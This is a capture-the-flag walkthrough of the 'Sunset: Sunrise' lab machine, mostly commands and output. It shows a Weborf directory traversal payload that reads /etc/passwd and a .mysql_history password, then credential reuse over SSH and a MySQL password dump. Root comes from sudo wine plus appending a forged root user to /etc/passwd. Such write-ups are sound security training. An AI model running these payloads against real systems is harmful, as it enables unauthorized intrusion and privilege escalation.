Sunset: Sunrise
Port recognition withnmap
┌──(root@ghost)-[/home/ghost]
└─# nmap -v -p- --open --min-rate 5000 sunrise.vuln -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-29 12:50 EST
Scanning sunrise.vuln (10.0.2.63) [65535 ports]
Discovered open port 8080/tcp on 10.0.2.63
Discovered open port 22/tcp on 10.0.2.63
Discovered open port 3306/tcp on 10.0.2.63
Discovered open port 80/tcp on 10.0.2.63
Completed SYN Stealth Scan at 12:50, 1.47s elapsed (65535 total ports)
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nginx 1.14.2
3306/tcp open mysql?
8080/tcp open http-proxy Weborf (GNU/Linux)
┌──(root@ghost)-[/home/ghost]
└─# whatweb http://sunrise.vuln:8080
http://sunrise.vuln:8080 [200 OK] Country[RESERVED][ZZ], HTTPServer[Linux][Weborf (GNU/Linux)], IP[10.0.2.63], Title[Weborf]
Visit http://sunrise.vuln:8080 and you will see 'Generated by Weborf/0.12.2 (GNU/Linux)'
┌──(root@ghost)-[/home/ghost]
└─# searchsploit weborf
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
weborf 0.12.2 - Directory Traversal | linux/remote/14925.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
┌──(root@ghost)-[/home/ghost]
└─# cat /usr/share/exploitdb/exploits/linux/remote/14925.txt
Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author: Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A
=============================================================
Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability. This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.
instance.c : line 240-244
------------------------------
void modURL(char* url) {
//Prevents the use of .. to access the whole filesystem <-- ORLY?
strReplace(url,"../",'\0');
replaceEscape(url);
------------------------------
Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
==============================================================
Stay safe,
Over and Out
┌──(root@ghost)-[/home/ghost]
└─# curl http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
avahi:x:107:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:118::/var/lib/saned:/usr/sbin/nologin
colord:x:109:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:110:7:HPLIP system user,,,:/var/run/hplip:/bin/false
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
uuidd:x:111:120::/run/uuidd:/usr/sbin/nologin
rtkit:x:112:121:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pulse:x:114:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
usbmux:x:115:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
geoclue:x:116:124::/var/lib/geoclue:/usr/sbin/nologin
tss:x:117:125:TPM2 software stack,,,:/var/lib/tpm:/bin/false
speech-dispatcher:x:118:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:120:127:Light Display Manager:/var/lib/lightdm:/bin/false
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
mysql:x:121:128:MySQL Server,,,:/nonexistent:/bin/false
We can list files and see indexed folders if we use our browser
┌──(root@ghost)-[/home/ghost]
└─# curl http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
a6050aecf6303b0b824038807d823a89
From here we can obtain user's flag
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c --hc=404 -w /usr/share/dirb/wordlists/common.txt -u "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2fFUZZ"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2fFUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 2 L 18 W 439 Ch "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f"
000000003: 200 113 L 483 W 3526 Ch ".bashrc"
000000016: 200 2 L 8 W 83 Ch ".mysql_history"
000000019: 200 27 L 130 W 807 Ch ".profile"
After fuzzing a lot directories we found .mysql_history file
┌──(root@ghost)-[/home/ghost]
└─# curl "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history"
show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';
Found credentials for mysql local database, maybe weborf reuse password for ssh
┌──(root@ghost)-[/home/ghost]
└─# ssh weborf@sunrise.vuln
weborf@sunrise.vuln's password:
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 5 16:24:32 2019 from 192.168.1.146
weborf@sunrise:~$
We are as weborf user now
┌──(root@ghost)-[/home/ghost]
└─# mysql mysql -u weborf -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 69
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> select User,Password from mysql.user;
+---------+-------------------------------------------+
| User | Password |
+---------+-------------------------------------------+
| root | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 |
| sunrise | thefutureissobrightigottawearshades |
| weborf | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 |
+---------+-------------------------------------------+
After checking the whole database we found sunrise user and password in clear text
weborf@sunrise:~$ su sunrise
Password:
sunrise@sunrise:/home/weborf$
And we can pivot to sunrise user
sunrise@sunrise:/home/weborf$ sudo -l
[sudo] password for sunrise:
Matching Defaults entries for sunrise on sunrise:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sunrise may run the following commands on sunrise:
(root) /usr/bin/wine
We can see that sunrise can execute /usr/bin/wine as root user
sunrise@sunrise:/home/weborf$ sudo -u root /usr/bin/wine cmd
Microsoft Windows 5.2.3790 (4.0)
Z:\home\weborf>type Z:\root\root.txt
^^ @@@@@@@@@
^^ ^^ @@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ ^^
@@@@@@@@@@@@@@@@@@@@
~~~~ ~~ ~~~~~ ~~~~~~~~ ~~ &&&&&&&&&&&&&&&&&&&& ~~~~~~~ ~~~~~~~~~~~ ~~~
~ ~~ ~ ~ ~~~~~~~~~~~~~~~~~~~~ ~ ~~ ~~ ~
~ ~~ ~~ ~~ ~~ ~~~~~~~~~~~~~ ~~~~ ~ ~~~ ~ ~~~ ~ ~~
~ ~~ ~ ~ ~~~~~~ ~~ ~~~ ~~ ~ ~~ ~~ ~
~ ~ ~ ~ ~ ~~ ~~~~~~ ~ ~~ ~ ~~
~ ~ ~ ~ ~~ ~ ~
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
24edb59d21c273c033aa6f1689b0b18c
And here root flag
To get out of wine context taking root privileges advantage we can abuse from /etc/passwd
┌──(root@ghost)-[/home/ghost]
└─# openssl passwd -1 -salt ghost root
$1$ghost$hei4EuMz/wBkKFXDT2bQT0
Generating password
┌──(root@ghost)-[/home/ghost]
└─# cat gowcroot.bat
echo|set /p=ghost:$1$ghost$hei4EuMz/wBkKFXDT2bQT0:0:0:root:/root:/bin/bash>>\etc\passwd
Wine payload
sunrise@sunrise:~$ sudo -u root /usr/bin/wine cmd
Microsoft Windows 5.2.3790 (4.0)
Z:\home\sunrise>echo|set /p=ghost:$1$ghost$hei4EuMz/wBkKFXDT2bQT0:0:0:root:/root:/bin/bash>>\etc\passwd
Z:\home\sunrise>exit
sunrise@sunrise:~$ su ghost
Password:
root@sunrise:/home/sunrise#
And we are root